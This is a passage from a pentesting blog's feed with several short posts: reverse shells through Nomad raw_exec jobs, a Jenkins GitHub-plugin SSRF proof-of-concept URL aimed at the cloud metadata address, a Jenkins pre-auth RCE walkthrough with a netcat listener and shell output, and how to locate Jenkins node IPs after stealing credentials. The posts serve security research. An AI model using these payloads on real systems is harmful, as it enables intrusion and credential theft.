1em;\"\u003E\u003Cimg border=\"0\" data-original-height=\"78\" data-original-width=\"1358\" height=\"36\" src=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEiza2dVv-hNAWpTeFCsysIeNHkSGnqjc57K_a7cNAN4tzs9CuC6Qv80DEpXXjX72NRXdr9JN82olebdExMZnMXn76riN5rc1gv4R9u3NALJZNMoTvwCSEFF2Graub0e56_KdT2W84YYaFs\/s640\/Screen+Shot+2018-12-18+at+11.31.58+AM.png\" width=\"640\" \/\u003E\u003C\/a\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\nforcefully run the garbage collection\u003C\/div\u003E\n\u003Cbr \/\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\n\u003Ca href=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEjFOlgacL3qsblM44YqxlQnz_DDMbjnR4pL24ieUKbUQTSVsSbh7w3uuikQSxwDo5VF0d2kqhIFf20cwo1mX3ZU84S9jeWa5yhj1kpRoBbPCsAUrzNeA9kDvcBWiktEt2YQkzlFkga7JVI\/s1600\/jobs-gc.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"\u003E\u003Cimg border=\"0\" data-original-height=\"449\" data-original-width=\"1600\" height=\"111\" src=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEjFOlgacL3qsblM44YqxlQnz_DDMbjnR4pL24ieUKbUQTSVsSbh7w3uuikQSxwDo5VF0d2kqhIFf20cwo1mX3ZU84S9jeWa5yhj1kpRoBbPCsAUrzNeA9kDvcBWiktEt2YQkzlFkga7JVI\/s400\/jobs-gc.png\" width=\"400\" \/\u003E\u003C\/a\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\nvalidation the job was deleted\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\n\u003Cbr \/\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: left;\"\u003E\nOK let's get a reverse shell. I used the following hcl file:\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: left;\"\u003E\n\u003Ca href=\"https:\/\/gist.github.com\/carnal0wnage\/4a436a8dc0dcb142a8c836e48916dd71\" target=\"_blank\"\u003Ehttps:\/\/gist.github.com\/carnal0wnage\/4a436a8dc0dcb142a8c836e48916dd71\u003C\/a\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: left;\"\u003E\n\u003Cbr \/\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\n\u003Ca href=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEiIxyOpUjaCcIBoC-8xsjCexQp3oU02WRDD8flfVpDpLR9HV5Hej75FG8INf81-qfu1A60pooioeS53lXp4I8KH-vyr5bjKVNwyIpaMJ6fAMDlwxuavGkmmAYMhmnSiWuupytGWvwKC7us\/s1600\/Screen+Shot+2018-12-18+at+11.37.24+AM.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"\u003E\u003Cimg border=\"0\" data-original-height=\"188\" data-original-width=\"1600\" height=\"74\" src=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEiIxyOpUjaCcIBoC-8xsjCexQp3oU02WRDD8flfVpDpLR9HV5Hej75FG8INf81-qfu1A60pooioeS53lXp4I8KH-vyr5bjKVNwyIpaMJ6fAMDlwxuavGkmmAYMhmnSiWuupytGWvwKC7us\/s640\/Screen+Shot+2018-12-18+at+11.37.24+AM.png\" width=\"640\" \/\u003E\u003C\/a\u003E\u003C\/div\u003E\n\u003Cdiv style=\"text-align: center;\"\u003E\nReverse shell job\u003C\/div\u003E\n\u003Cdiv style=\"text-align: center;\"\u003E\n\u003Cbr \/\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\n\u003Ca href=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhmN0UPapQTUMZZ1C1GTVzX7TOjB9kb0ytM5wk2lfP-sa4AoCtAlQXXZ6vcdRLvm4HiUEXI1GV27O6oTICDdDgAPzrZS4IYSWxoEBemfGdK4014yBRy_7QC49fRkCRCaE3V7_pcoNATjl4\/s1600\/Screen+Shot+2018-12-18+at+11.37.11+AM.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"\u003E\u003Cimg border=\"0\" data-original-height=\"541\" data-original-width=\"1600\" height=\"216\" src=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhmN0UPapQTUMZZ1C1GTVzX7TOjB9kb0ytM5wk2lfP-sa4AoCtAlQXXZ6vcdRLvm4HiUEXI1GV27O6oTICDdDgAPzrZS4IYSWxoEBemfGdK4014yBRy_7QC49fRkCRCaE3V7_pcoNATjl4\/s640\/Screen+Shot+2018-12-18+at+11.37.11+AM.png\" width=\"640\" \/\u003E\u003C\/a\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\nShell from nomad\u003C\/div\u003E\n\u003Cdiv style=\"text-align: center;\"\u003E\n\u003Cbr \/\u003E\u003C\/div\u003E\n\u003Cdiv style=\"text-align: left;\"\u003E\n-CG\u003C\/div\u003E\n\u003Cbr \/\u003E\nInfo on locking nomad down via ACLs:\u003Cbr \/\u003E\n\u003Ca href=\"https:\/\/www.nomadproject.io\/guides\/security\/acl.html\" target=\"_blank\"\u003Ehttps:\/\/www.nomadproject.io\/guides\/security\/acl.html\u003C\/a\u003E\u003Cbr \/\u003E\n\u003Cbr \/\u003E"},"link":[{"rel":"replies","type":"application/atom+xml","href":"https:\/\/blog.carnal0wnage.com\/feeds\/1555777666843031796\/comments\/default","title":"Post Comments"},{"rel":"replies","type":"text/html","href":"https:\/\/www.blogger.com\/comment\/fullpage\/post\/8539880144347728238\/1555777666843031796","title":"0 Comments"},{"rel":"edit","type":"application/atom+xml","href":"https:\/\/www.blogger.com\/feeds\/8539880144347728238\/posts\/default\/1555777666843031796"},{"rel":"self","type":"application/atom+xml","href":"https:\/\/www.blogger.com\/feeds\/8539880144347728238\/posts\/default\/1555777666843031796"},{"rel":"alternate","type":"text/html","href":"https:\/\/blog.carnal0wnage.com\/2019\/12\/devoops-nomad-with-rawexec-enabled.html","title":"Devoops: Nomad with raw_exec enabled"}],"author":[{"name":{"$t":"Unknown"},"email":{"$t":"noreply@blogger.com"},"gd$image":{"rel":"http://schemas.google.com/g/2005#thumbnail","width":"16","height":"16","src":"https:\/\/img1.blogblog.com\/img\/b16-rounded.gif"}}],"media$thumbnail":{"xmlns$media":"http://search.yahoo.com/mrss/","url":"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEgQ9QlLr-VtGooRSnb9nyLDGFwz34YQBvr4VW4M2STPc2-tg3B9kKyHJ_v4gcM-35fQY_zE662fTH8C1m3Ag8qbD5c9BosEaeQ65eAFIJcvhY6qdFBetT7ohPQCgzY-rkKwPuYZyZ9fEsY\/s72-c\/Screen+Shot+2018-12-18+at+10.57.58+AM.png","height":"72","width":"72"},"thr$total":{"$t":"0"}},{"id":{"$t":"tag:blogger.com,1999:blog-8539880144347728238.post-2715327188736957907"},"published":{"$t":"2019-03-05T14:01:00.003-05:00"},"updated":{"$t":"2019-03-05T14:01:41.948-05:00"},"category":[{"scheme":"http://www.blogger.com/atom/ns#","term":"devops"},{"scheme":"http://www.blogger.com/atom/ns#","term":"jenkins"},{"scheme":"http://www.blogger.com/atom/ns#","term":"Pentesting"}],"title":{"type":"text","$t":"Jenkins - CVE-2018-1000600 PoC"},"content":{"type":"html","$t":"\u003Cbr \/\u003E\n\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003Esecond exploit from the blog post\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Ca href=\"https:\/\/blog.orange.tw\/2019\/01\/hacking-jenkins-part-1-play-with-dynamic-routing.html\" target=\"_blank\"\u003E\u003Cspan style=\"color: #444444;\"\u003Ehttps:\/\/blog.orange.tw\/2019\/01\/hacking-jenkins-part-1-play-with-dynamic-routing.html\u003C\/span\u003E\u003C\/a\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cspan style=\"background-color: white; font-family: \u0026quot;ubuntu\u0026quot;;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"background-color: white; font-family: \u0026quot;ubuntu\u0026quot;;\"\u003EChained with CVE-2018-1000600 to a Pre-auth Fully-responded SSRF\u003C\/span\u003E\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"background-color: white;\"\u003E\u003Cspan style=\"color: #444444; font-family: \u0026quot;ubuntu\u0026quot;;\"\u003E\u003Ca href=\"https:\/\/jenkins.io\/security\/advisory\/2018-06-25\/#SECURITY-915\"\u003Ehttps:\/\/jenkins.io\/security\/advisory\/2018-06-25\/#SECURITY-915\u003C\/a\u003E\u003C\/span\u003E\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cspan style=\"background-color: white;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"background-color: white;\"\u003EThis affects the GitHub\u0026nbsp;plugin that is installed by default. However, I learned that when you spin up a new jenkins instance it pulls all the updated plugins (also by default) I'm honestly not sure how often people set update to latest plugin on by default but it does seem to knock down some of this stuff.\u003C\/span\u003E\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cspan style=\"background-color: white;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"background-color: white;\"\u003Eexploit works against:\u0026nbsp;\u003C\/span\u003EGitHub Plugin up to and including 1.29.1\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444;\"\u003EWhen i installed Jenkins today (25 Feb 19) it installed 1.29.4 by default thus the below does NOT work.\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444;\"\u003EFrom the blog post:\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cbr \/\u003E\n\u003Cblockquote class=\"tr_bq\"\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cspan style=\"background-color: #f8f8f8; font-family: \u0026quot;ubuntu\u0026quot;; font-size: 13.2px;\"\u003ECSRF vulnerability and missing permission checks in GitHub Plugin allowed capturing credentials\u003C\/span\u003E\u0026nbsp;\u003C\/span\u003E\u003C\/blockquote\u003E\n\u003Cblockquote class=\"tr_bq\"\u003E\n\u003Cspan style=\"background-color: white; color: #444444; font-family: \u0026quot;ubuntu\u0026quot;; font-size: 13.2px;\"\u003EIt can extract any stored credentials with known credentials ID in Jenkins. But the credentials ID is a random UUID if there is no user-supplied value provided. So it seems impossible to exploit this?(Or if someone know how to obtain credentials ID, please tell me!)\u003C\/span\u003E\u003C\/blockquote\u003E\n\u003Cblockquote class=\"tr_bq\"\u003E\n\u003Cspan style=\"background-color: white; color: #444444; font-family: \u0026quot;ubuntu\u0026quot;; font-size: 13.2px;\"\u003EAlthough it can’t extract any credentials without known credentials ID, there is still another attack primitive - a fully-response SSRF! We all know how hard it is to exploit a Blind SSRF, so that’s why a fully-responded SSRF is so valuable!\u003C\/span\u003E\u003C\/blockquote\u003E\n\u003Cdiv style=\"background-color: white; box-sizing: border-box; font-family: \u0026quot;ubuntu\u0026quot;; font-weight: 300; line-height: 1.1; margin: 1.2em 0px; position: relative;\"\u003E\n\u003Cspan style=\"color: #444444;\"\u003EPoC:\u003C\/span\u003E\u003C\/div\u003E\n\u003Cpre style=\"background-color: #f8f8f8; border-radius: 5px; border: 0px; box-sizing: border-box; font-family: \u0026quot;source code pro\u0026quot;, monospace; font-size: 0.9em; line-height: 1.45; margin-bottom: 1.1em; overflow-wrap: break-word; padding: 10px 20px; white-space: pre-wrap;\"\u003E\u003Ccode style=\"background-color: transparent; border-radius: 0px; box-sizing: border-box; font-family: \u0026quot;source code pro\u0026quot;, monospace; font-size: inherit; padding: 0px;\"\u003E\u003Cspan style=\"color: #444444;\"\u003Ehttp:\/\/jenkins.local\/securityRealm\/user\/admin\/descriptorByName\/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator\/createTokenByPassword\n?apiUrl=http:\/\/169.254.169.254\/%23\n\u0026amp;login=orange\n\u0026amp;password=tsai\u003C\/span\u003E\u003C\/code\u003E\u003C\/pre\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cspan style=\"background-color: white; font-family: \u0026quot;ubuntu\u0026quot;;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\u003Cspan style=\"font-family: \u0026quot;ubuntu\u0026quot;;\"\u003E\u003Cspan style=\"background-color: white;\"\u003ETo get old versions of the plugin and info you can go to\u0026nbsp;\u003C\/span\u003E\u003C\/span\u003E\u0026nbsp;\u003Cspan style=\"background-color: white; font-family: \u0026quot;ubuntu\u0026quot;;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"background-color: white;\"\u003E\u003Cspan style=\"font-family: \u0026quot;ubuntu\u0026quot;;\"\u003E\u003Ca href=\"https:\/\/wiki.jenkins.io\/display\/JENKINS\/GitHub+Branch+Source+Plugin\" target=\"_blank\"\u003Ehttps:\/\/wiki.jenkins.io\/display\/JENKINS\/GitHub+Branch+Source+Plugin\u003C\/a\u003E\u003C\/span\u003E\u003C\/span\u003E\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cspan style=\"background-color: white;\"\u003E\u003Cspan style=\"font-family: \u0026quot;ubuntu\u0026quot;;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\u003C\/span\u003E\n\u003Cspan style=\"background-color: white;\"\u003E\u003Cspan style=\"font-family: \u0026quot;ubuntu\u0026quot;;\"\u003Edownload old versions\u003C\/span\u003E\u003C\/span\u003E\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"background-color: white;\"\u003E\u003Cspan style=\"color: #444444; font-family: \u0026quot;ubuntu\u0026quot;;\"\u003E\u003Ca href=\"https:\/\/updates.jenkins.io\/download\/plugins\/github-branch-source\/\" target=\"_blank\"\u003Ehttps:\/\/updates.jenkins.io\/download\/plugins\/github-branch-source\/\u003C\/a\u003E\u003C\/span\u003E\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"background-color: white;\"\u003E\u003Cspan style=\"color: #444444; font-family: \u0026quot;ubuntu\u0026quot;;\"\u003E\u003Ca href=\"https:\/\/updates.jenkins.io\/download\/plugins\/github\/\" target=\"_blank\"\u003Ehttps:\/\/updates.jenkins.io\/download\/plugins\/github\/\u003C\/a\u003E\u003C\/span\u003E\u003C\/span\u003E"},"link":[{"rel":"replies","type":"application/atom+xml","href":"https:\/\/blog.carnal0wnage.com\/feeds\/2715327188736957907\/comments\/default","title":"Post Comments"},{"rel":"replies","type":"text/html","href":"https:\/\/www.blogger.com\/comment\/fullpage\/post\/8539880144347728238\/2715327188736957907","title":"0 Comments"},{"rel":"edit","type":"application/atom+xml","href":"https:\/\/www.blogger.com\/feeds\/8539880144347728238\/posts\/default\/2715327188736957907"},{"rel":"self","type":"application/atom+xml","href":"https:\/\/www.blogger.com\/feeds\/8539880144347728238\/posts\/default\/2715327188736957907"},{"rel":"alternate","type":"text/html","href":"https:\/\/blog.carnal0wnage.com\/2019\/03\/jenkins-cve-2018-1000600-poc.html","title":"Jenkins - CVE-2018-1000600 PoC"}],"author":[{"name":{"$t":"Unknown"},"email":{"$t":"noreply@blogger.com"},"gd$image":{"rel":"http://schemas.google.com/g/2005#thumbnail","width":"16","height":"16","src":"https:\/\/img1.blogblog.com\/img\/b16-rounded.gif"}}],"thr$total":{"$t":"0"}},{"id":{"$t":"tag:blogger.com,1999:blog-8539880144347728238.post-6814904859046744361"},"published":{"$t":"2019-03-04T22:26:00.000-05:00"},"updated":{"$t":"2019-03-04T22:26:46.045-05:00"},"category":[{"scheme":"http://www.blogger.com/atom/ns#","term":"devops"},{"scheme":"http://www.blogger.com/atom/ns#","term":"jenkins"},{"scheme":"http://www.blogger.com/atom/ns#","term":"Pentesting"}],"title":{"type":"text","$t":"Jenkins - messing with exploits pt3 - CVE-2019-1003000"},"content":{"type":"html","$t":"\u003Cspan style=\"color: #444444;\"\u003EReferences:\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Ca href=\"https:\/\/www.exploit-db.com\/exploits\/46453\" target=\"_blank\"\u003E\u003Cspan style=\"color: #444444;\"\u003Ehttps:\/\/www.exploit-db.com\/exploits\/46453\u003C\/span\u003E\u003C\/a\u003E\u003Cbr \/\u003E\n\u003Ca href=\"http:\/\/blog.orange.tw\/2019\/02\/abusing-meta-programming-for-unauthenticated-rce.html\" target=\"_blank\"\u003E\u003Cspan style=\"color: #444444;\"\u003Ehttp:\/\/blog.orange.tw\/2019\/02\/abusing-meta-programming-for-unauthenticated-rce.html\u003C\/span\u003E\u003C\/a\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444;\"\u003EThis post covers the Orange Tsai Jenkins pre-auth exploit\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444;\"\u003EVuln versions: Jenkins \u0026lt; 2.137 (preauth)\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444;\"\u003EPipeline: Declarative Plugin up to and including 1.3.4\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003EPipeline: Groovy Plugin up to and including 2.61\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003EScript Security Plugin up to and including 1.49\u0026nbsp; (in CG's testing 1.50 is also vuln)\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444;\"\u003EThe exploitdb link above lists a nice self contained exploit that will compile the jar for you and serve it up for retrieval by the vulnerable Jenkins server.\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\n\u003Ca href=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEg3aWYiGSzqFouxlLuHO6NIRmeQkTANpp3YHqiLg9-3a9HF-jB_SzvWyuAo-S-74beguoNCsVD2XhX8rKmokJfz4e90H99B5K67eQ-nk3ib_yYMp1L9MsD2BUtR268z6XbmbHkMG2WcrqU\/s1600\/Screen+Shot+2019-03-04+at+10.10.59+PM.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"\u003E\u003Cspan style=\"color: #444444;\"\u003E\u003Cimg border=\"0\" data-original-height=\"409\" data-original-width=\"1600\" height=\"162\" src=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEg3aWYiGSzqFouxlLuHO6NIRmeQkTANpp3YHqiLg9-3a9HF-jB_SzvWyuAo-S-74beguoNCsVD2XhX8rKmokJfz4e90H99B5K67eQ-nk3ib_yYMp1L9MsD2BUtR268z6XbmbHkMG2WcrqU\/s640\/Screen+Shot+2019-03-04+at+10.10.59+PM.png\" width=\"640\" \/\u003E\u003C\/span\u003E\u003C\/a\u003E\u003C\/div\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444; font-family: Courier New, Courier, monospace;\"\u003Enc -l 8888 -vv\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: Courier New, Courier, monospace;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444; font-family: Courier New, Courier, monospace;\"\u003Ewhoami\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: Courier New, Courier, monospace;\"\u003Ebash: no job control in this shell\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: Courier New, Courier, monospace;\"\u003E\u0026nbsp;bash-3.2$ jenkins\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444; font-family: Times, Times New Roman, serif;\"\u003EAfter Jenkins 2.138 the preauth is gone but if you have\u0026nbsp; an overall read token and the plugins are still vulnerable you can still exploit that server.\u0026nbsp; You can just add your cookie to the script and it will hit the url with your authenticated cookie and you can still exploit the server.\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: Times, Times New Roman, serif;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\n\u003Ca href=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEgTCbP9HVZm6fIKHdmevuqtwz8tLMEtjqpkT3aQ_aUdB5AHhOYjqYk1sBF37FgAa2D3E9wXJheqsyYbBmh910-8B2y3WhmaKWDVLvpjeZzWgKPCAR1ar1-8WC9zJkqY0T6TzgkOcF1uUu8\/s1600\/Screen+Shot+2019-03-04+at+10.21.38+PM.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"\u003E\u003Cspan style=\"color: #444444;\"\u003E\u003Cimg border=\"0\" data-original-height=\"244\" data-original-width=\"1112\" height=\"87\" src=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEgTCbP9HVZm6fIKHdmevuqtwz8tLMEtjqpkT3aQ_aUdB5AHhOYjqYk1sBF37FgAa2D3E9wXJheqsyYbBmh910-8B2y3WhmaKWDVLvpjeZzWgKPCAR1ar1-8WC9zJkqY0T6TzgkOcF1uUu8\/s400\/Screen+Shot+2019-03-04+at+10.21.38+PM.png\" width=\"400\" \/\u003E\u003C\/span\u003E\u003C\/a\u003E\u003C\/div\u003E\n\u003Cspan style=\"font-family: Times, Times New Roman, serif;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E"},"link":[{"rel":"replies","type":"application/atom+xml","href":"https:\/\/blog.carnal0wnage.com\/feeds\/6814904859046744361\/comments\/default","title":"Post Comments"},{"rel":"replies","type":"text/html","href":"https:\/\/www.blogger.com\/comment\/fullpage\/post\/8539880144347728238\/6814904859046744361","title":"0 Comments"},{"rel":"edit","type":"application/atom+xml","href":"https:\/\/www.blogger.com\/feeds\/8539880144347728238\/posts\/default\/6814904859046744361"},{"rel":"self","type":"application/atom+xml","href":"https:\/\/www.blogger.com\/feeds\/8539880144347728238\/posts\/default\/6814904859046744361"},{"rel":"alternate","type":"text/html","href":"https:\/\/blog.carnal0wnage.com\/2019\/03\/jenkins-messing-with-exploits-pt3-cve.html","title":"Jenkins - messing with exploits pt3 - CVE-2019-1003000"}],"author":[{"name":{"$t":"Unknown"},"email":{"$t":"noreply@blogger.com"},"gd$image":{"rel":"http://schemas.google.com/g/2005#thumbnail","width":"16","height":"16","src":"https:\/\/img1.blogblog.com\/img\/b16-rounded.gif"}}],"media$thumbnail":{"xmlns$media":"http://search.yahoo.com/mrss/","url":"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEg3aWYiGSzqFouxlLuHO6NIRmeQkTANpp3YHqiLg9-3a9HF-jB_SzvWyuAo-S-74beguoNCsVD2XhX8rKmokJfz4e90H99B5K67eQ-nk3ib_yYMp1L9MsD2BUtR268z6XbmbHkMG2WcrqU\/s72-c\/Screen+Shot+2019-03-04+at+10.10.59+PM.png","height":"72","width":"72"},"thr$total":{"$t":"0"}},{"id":{"$t":"tag:blogger.com,1999:blog-8539880144347728238.post-8575904409576959407"},"published":{"$t":"2019-03-04T21:16:00.002-05:00"},"updated":{"$t":"2019-03-04T21:16:15.412-05:00"},"category":[{"scheme":"http://www.blogger.com/atom/ns#","term":"devops"},{"scheme":"http://www.blogger.com/atom/ns#","term":"jenkins"},{"scheme":"http://www.blogger.com/atom/ns#","term":"Pentesting"}],"title":{"type":"text","$t":"Jenkins - Identify IP Addresses of nodes"},"content":{"type":"html","$t":"\u003Cspan style=\"color: #444444;\"\u003EWhile doing some research I found several posts on stackoverflow asking how to identify the IP address of nodes.\u0026nbsp; You might want to know this if you read the \u003Ca href=\"https:\/\/carnal0wnage.attackresearch.com\/2019\/02\/jenkins-decrypting-credentialsxml.html\" target=\"_blank\"\u003Edecrypting credentials post\u003C\/a\u003E\u0026nbsp;and managed to get yourself some ssh keys for nodes but you cant actually see the node's IP in the Jenkins UI.\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444;\"\u003EStackoverflow link:\u0026nbsp;\u003Ca href=\"https:\/\/stackoverflow.com\/questions\/14930329\/finding-ip-of-a-jenkins-node\" target=\"_blank\"\u003Ehttps:\/\/stackoverflow.com\/questions\/14930329\/finding-ip-of-a-jenkins-node\u003C\/a\u003E\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003Eblog on setting up a node:\u0026nbsp;\u003Ca href=\"https:\/\/embeddedartistry.com\/blog\/2017\/12\/22\/jenkins-configuring-a-linux-slave-node\" target=\"_blank\"\u003Ehttps:\/\/embeddedartistry.com\/blog\/2017\/12\/22\/jenkins-configuring-a-linux-slave-node\u003C\/a\u003E\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u0026nbsp;There are great answers in the stackoverflow post on using the script console but in the event you found yourself with just the Jenkins directory or no access to the script console it's pretty easy to get this information.\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444;\"\u003EYou can just browse to \u003Cspan style=\"font-family: Courier New, Courier, monospace;\"\u003Ejenkins-ip\/computer\/$nodename\/config.xml\u003C\/span\u003E. This request will require the \u003Cb\u003Eextended read \u003C\/b\u003Epermission.\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\n\u003C\/div\u003E\n\u003Cbr \/\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\n\u003Ca href=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEguSdi39W7IQVPRxn7K2eXB-ZnOy0NUQY9ojUe3_qbD31uOk6hZgft2dHwamo-OTP6q3w8YoiUgzVz2bO8LuoFlBtwh7-Akhw5oegYYLfwZry5z7_2IQLHIop65eCYi4hoedRXBm9gPvgI\/s1600\/Screen+Shot+2019-03-04+at+9.14.23+PM.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"\u003E\u003Cspan style=\"color: #444444;\"\u003E\u003Cimg border=\"0\" data-original-height=\"636\" data-original-width=\"1600\" height=\"254\" src=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEguSdi39W7IQVPRxn7K2eXB-ZnOy0NUQY9ojUe3_qbD31uOk6hZgft2dHwamo-OTP6q3w8YoiUgzVz2bO8LuoFlBtwh7-Akhw5oegYYLfwZry5z7_2IQLHIop65eCYi4hoedRXBm9gPvgI\/s640\/Screen+Shot+2019-03-04+at+9.14.23+PM.png\" width=\"640\" \/\u003E\u003C\/span\u003E\u003C\/a\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\n\u003C\/div\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444;\"\u003EOptionally if you are on the box\u0026nbsp; or have a backup you can go to \u003Cspan style=\"font-family: Courier New, Courier, monospace;\"\u003Ejenkins-dir\/nodes\/$nodename\/config.xml\u003C\/span\u003E\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: Courier New, Courier, 